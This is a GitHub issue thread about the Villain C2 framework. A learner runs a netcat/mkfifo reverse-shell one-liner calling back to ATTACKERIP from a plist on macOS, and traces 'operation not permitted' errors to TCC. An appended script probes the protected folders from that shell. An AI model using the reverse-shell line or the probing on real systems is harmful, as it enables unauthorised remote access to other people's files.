t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).

Confirming Normal Behavior on macOS #153

Closed OllyHill closed 3 months ago

OllyHill commented 3 months ago

Hi mate, I'm getting started with pentesting and C2s and looking to gain experience. My target is macOS. I have Sonoma 14.5 with default settings.

To get started, I used the following on the target that I found on revshells.com. This is being run under /bin/bash/ from a plist:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKERIP 4443 >/tmp/f

This connected back to Villain just fine and I get a shell. In the shell, if I navigate to Documents or Desktop and ls, I receive "operation not permitted." Is this due to how the payload is being run on macOS or due to macOS security? Or due to some Villain settings? I tried the nohup python3 command that Villain generates, but the target macOS machine does not have python3 installed by default and I am trying to keep macOS as default as possible to learn from. Sorry mate if this is too basic, but I'm just trying to get involved in cybersecurity.

t3l3machus commented 3 months ago

Hi, sorry for the delay.

The "operation not permitted." must be due to macOS security restrictions. Are you running the commands as root? Not an expert with macOS systems but this is probably due to SIP: https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection

OllyHill commented 3 months ago

Thank you mate for getting back to me. I did some more research and it seems like it's due to TCC from macOS security. If I'm putting it down correctly, macOS has protected folders that the user must authorize access to. This could be the Desktop or Documents, but not every folder has this issue, which is what was confusing me earlier. I do not fancy this as a Villain issue at all, just user error/novice. This can be closed.

Thanks for a great piece of software mate.
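One way to turn the TCC explanation in the closing comment into a repeatable check from the reverse shell itself. This is an added example, not code from the Villain project or from anyone in this issue. It relies on the fact that macOS reports a TCC denial as EPERM, which `ls` prints as "Operation not permitted", while an ordinary POSIX mode-bit failure is EACCES, printed as "Permission denied". The directory list (Desktop, Documents, Downloads as TCC-gated, /tmp and the home directory itself as controls) and the category names are my choices for the example, not something the page states.

```sh
#!/bin/sh
# Added example (not part of Villain or of this issue): probe the user folders
# that macOS TCC gates and classify why a listing failed.
# TCC denials surface as EPERM ("Operation not permitted"); plain POSIX
# permission failures surface as EACCES ("Permission denied").

# classify_ls_error STDERR_TEXT
# Prints one of: ok | tcc-denied | posix-denied | missing | unknown
classify_ls_error() {
    case "$1" in
        "")                              echo ok ;;
        *"Operation not permitted"*)     echo tcc-denied ;;
        *"Permission denied"*)           echo posix-denied ;;
        *"No such file or directory"*)   echo missing ;;
        *)                               echo unknown ;;
    esac
}

# probe_dir DIR
# Lists DIR, keeping only stderr, and prints "DIR<TAB>category".
# The "|| true" keeps a failing ls from aborting a script run under set -e.
probe_dir() {
    err=$(ls "$1" 2>&1 >/dev/null) || true
    printf '%s\t%s\n' "$1" "$(classify_ls_error "$err")"
}

# probe_tcc_dirs [HOME_DIR]
# Probes the well-known TCC-gated user folders (assumed list for this
# example) plus two control directories that TCC does not gate, so a
# failure on the controls points at something other than TCC.
probe_tcc_dirs() {
    home="${1:-$HOME}"
    for d in Desktop Documents Downloads; do
        probe_dir "$home/$d"
    done
    probe_dir "$home"
    probe_dir /tmp
}

# Stand-alone run: print one line per directory for the current user.
probe_tcc_dirs "$HOME"
```

Run it from the shell Villain hands you and compare with the same script run from Terminal.app on the target. The results can differ because TCC decides access by the responsible process: a shell launched from a plist by launchd is not a child of Terminal, so any Files and Folders or Full Disk Access grant Terminal has does not carry over to it, whereas the same `ls` typed into Terminal succeeds. A `tcc-denied` line on a control directory, or a `posix-denied` line anywhere, means the cause is not TCC and is worth investigating separately.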